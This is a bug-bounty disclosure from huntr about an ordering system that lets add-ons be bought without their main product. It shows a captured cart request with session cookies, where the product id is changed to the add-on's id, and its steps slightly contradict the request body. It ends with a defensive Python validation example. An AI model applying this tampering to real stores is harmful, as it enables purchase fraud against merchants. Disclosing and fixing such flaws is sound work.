huntr | Lujiefsi | 0A7EE1FB-E693-4259-ABF8-A2C3218C1647
Jun 11, 2023 - 8:20 a.m.

Users can order Add-Ons Separately

2023-06-11 08:20:47
lujiefsi
www.huntr.dev
add-ons
vulnerability
attack

EPSS: 0.001 (Low), percentile 30.8%

Description

I found a requirement that add-ons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the add-on.

Proof of Concept

1. The user orders the product.

2. Use Burp Suite to intercept the request:

POST /index.php?_url=/api/guest/cart/add_item HTTP/1.1
Host: localhost
Content-Length: 58
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/orderbutton?order=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_SESSION_ID=28c355e130917b8a2f817792256db866; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; PHPSESSID=9fd364ab4e45a218a605f6129bfec942; BBLANG=en_US
Connection: close

CSRFToken=593265e9721d74ae839c486bc5a96102&form_id=1&id=6&&multiple=1&id=1

3. Change id=1 to id=6.

4. id=6 is the ID of one of the add-ons.

5. Send the request; it succeeds.
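
The server-side check whose absence the steps above demonstrate, as an added example (not code from the report or from the affected application). The catalogue, `PRODUCTS`, `CartError`, `parse_item_id`, `orphan_addons` and `add_item` are hypothetical names; the IDs 1 and 6 mirror the ones in the steps.

```python
from urllib.parse import parse_qs

# Constructed catalogue (assumption): product 1 is a main product that
# offers add-on 6, matching the ids used in the steps above.
PRODUCTS = {
    1: {"is_addon": False, "addons": {6}},
    6: {"is_addon": True, "addons": set()},
}


class CartError(Exception):
    """Raised when an add_item request must be refused."""


def parse_item_id(body: str) -> int:
    """Return the single product id carried by a form-encoded body."""
    ids = parse_qs(body).get("id", [])
    # The captured body carries two id fields; refuse anything that is not
    # exactly one numeric id rather than guessing which value counts.
    if len(ids) != 1 or not (ids[0].isascii() and ids[0].isdigit()):
        raise CartError("exactly one numeric id is required")
    return int(ids[0])


def orphan_addons(cart: list[int]) -> list[int]:
    """Add-ons in the cart that no main product in the same cart offers."""
    return [
        item for item in cart
        if PRODUCTS[item]["is_addon"]
        and not any(item in PRODUCTS[p]["addons"] for p in cart)
    ]


def add_item(cart: list[int], body: str) -> list[int]:
    """Validate an add_item request on the server; return the new cart."""
    item_id = parse_item_id(body)
    if item_id not in PRODUCTS:
        raise CartError("unknown product")
    new_cart = cart + [item_id]
    # Decide from server-side catalogue data, never from the client-sent
    # id alone, whether the add-on has its main product alongside it.
    if orphan_addons(new_cart):
        raise CartError("add-on requires its main product in the cart")
    return new_cart
```

Running `orphan_addons` again at checkout keeps the rule intact if the main product is removed after the add-on was accepted.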
